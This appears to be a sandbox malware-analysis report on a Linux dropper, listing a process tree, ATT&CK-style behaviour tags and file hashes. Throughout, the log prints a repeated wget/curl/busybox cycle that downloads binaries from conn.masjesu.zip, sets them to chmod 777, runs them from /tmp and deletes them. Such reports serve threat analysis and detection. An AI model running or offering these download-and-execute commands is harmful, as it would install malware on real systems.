/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- System Network Configuration Discovery
PID:974
-
-
/bin/chmodchmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:977
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:978
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- System Network Configuration Discovery
PID:981
-
-
/bin/chmodchmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:984
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- System Network Configuration Discovery
PID:985
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:986
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- System Network Configuration Discovery
PID:988
-
-
/bin/chmodchmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- File and Directory Permissions Modification
PID:989
-
-
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Executes dropped EXE
PID:990
-
-
/bin/rmrm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:991
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:992
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:993
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:995
-
-
/bin/chmodchmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- File and Directory Permissions Modification
PID:996
-
-
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Executes dropped EXE
PID:997
-
-
/bin/rmrm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:998
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:999
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1000
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- System Network Configuration Discovery
PID:1002
-
-
/bin/chmodchmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- File and Directory Permissions Modification
PID:1003
-
-
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Executes dropped EXE
PID:1004
-
-
/bin/rmrm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:1005
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- System Network Configuration Discovery
PID:1006
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1007
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- System Network Configuration Discovery
PID:1009
-
-
/bin/chmodchmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- File and Directory Permissions Modification
PID:1010
-
-
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Executes dropped EXE
PID:1011
-
-
/bin/rmrm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:1012
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- System Network Configuration Discovery
PID:1013
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1014
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:1016
-
-
/bin/chmodchmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- File and Directory Permissions Modification
PID:1017
-
-
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Executes dropped EXE
PID:1018
-
-
/bin/rmrm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:1019
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- System Network Configuration Discovery
PID:1020
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1021
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- System Network Configuration Discovery
PID:1023
-
-
/bin/chmodchmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- File and Directory Permissions Modification
PID:1024
-
-
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Executes dropped EXE
PID:1025
-
-
/bin/rmrm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:1026
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:1027
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1028
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- System Network Configuration Discovery
PID:1030
-
-
/bin/chmodchmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- File and Directory Permissions Modification
PID:1031
-
-
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Executes dropped EXE
PID:1032
-
-
/bin/rmrm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:1033
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- System Network Configuration Discovery
PID:1034
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1035
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- System Network Configuration Discovery
PID:1037
-
-
/bin/chmodchmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- File and Directory Permissions Modification
PID:1038
-
-
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Executes dropped EXE
PID:1039
-
-
/bin/rmrm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:1040
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97